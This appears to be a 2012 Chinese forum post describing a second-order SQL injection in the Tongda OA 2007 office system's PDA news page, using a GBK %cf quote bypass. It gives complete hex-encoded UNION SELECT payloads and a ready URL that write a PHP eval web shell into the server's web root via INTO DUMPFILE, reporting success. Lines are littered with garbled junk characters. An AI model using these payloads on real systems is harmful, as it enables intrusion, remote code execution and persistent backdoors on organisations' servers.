目前测试通达OA2007版本
- V0 n- w$ O% L) d" O3 K2 @9 E" _# D/ U& U7 b. a
7 _$ B: F) Z" F/ C% X& HOffice Anywhere 2007 网络智能办公系统
+ S# ]% R0 {( m8 {
7 {; h- a9 @0 n' m7 c/ Mhttp://127.0.0.1/pda/news/read.php?P=%cf' 猪点。 暴web目录..: m/ x5 x1 p6 }: A1 ?
5 C5 b* _& z; L) ^" M
3 x/ q! ~; {' f* ^3 y) ~这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的
" X% J2 p, B( Z# f! {; B ; {' M" e) Q! N4 S/ w
例如:SELECT * from USER where USER_ID='{$USERNAME}' 0 R( O: f( q2 j5 L' v
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
9 Y* A& o8 R( D! E, d! f$ K
! }1 R& a9 J, k% i: G% }3 T# |1 v这个时候我们是不是可以组合起来使用哪?1 h! J* {8 m0 ^7 j* j: F! J
/ I' M/ C' V6 [5 O6 |: T) o9 R( V
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样$ V3 Q3 Q6 h5 } s! z
union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
( I; A! j( c! h4 o" @. M4 R: p9 z
; v4 N1 q8 ^& o2 K& D4 I8 T这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
; }. p- A$ U+ h: _, z/ h9 x : o& V. X! W, s7 m* M
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
0 ?- |/ C" {. U3 j8 }
7 q8 a) O' |+ }+ w* @/ g4 c5 P7 l那么我们用字符串格式带入进行hex编码2 c3 M/ E/ [" ~- s( x
6 f& j. T! q$ o! |/ J
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
1 T R; Q: N" q6 C 9 ]7 a# r! T3 ?8 k, d
测试ok,获取oa的webshell. H: q9 \9 l8 F3 H4 i2 ?* w+ f% `9 x1 E7 s
" H# K X; t% V- {" L5 S9 x 7 B$ e8 h4 f. w, N; {4 n$ [
pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
' @* d1 t4 b; r7 F( d2 E7 t! k直接getwebshell |
发表于 2012-12-20 08:09:24
收藏
支持
反对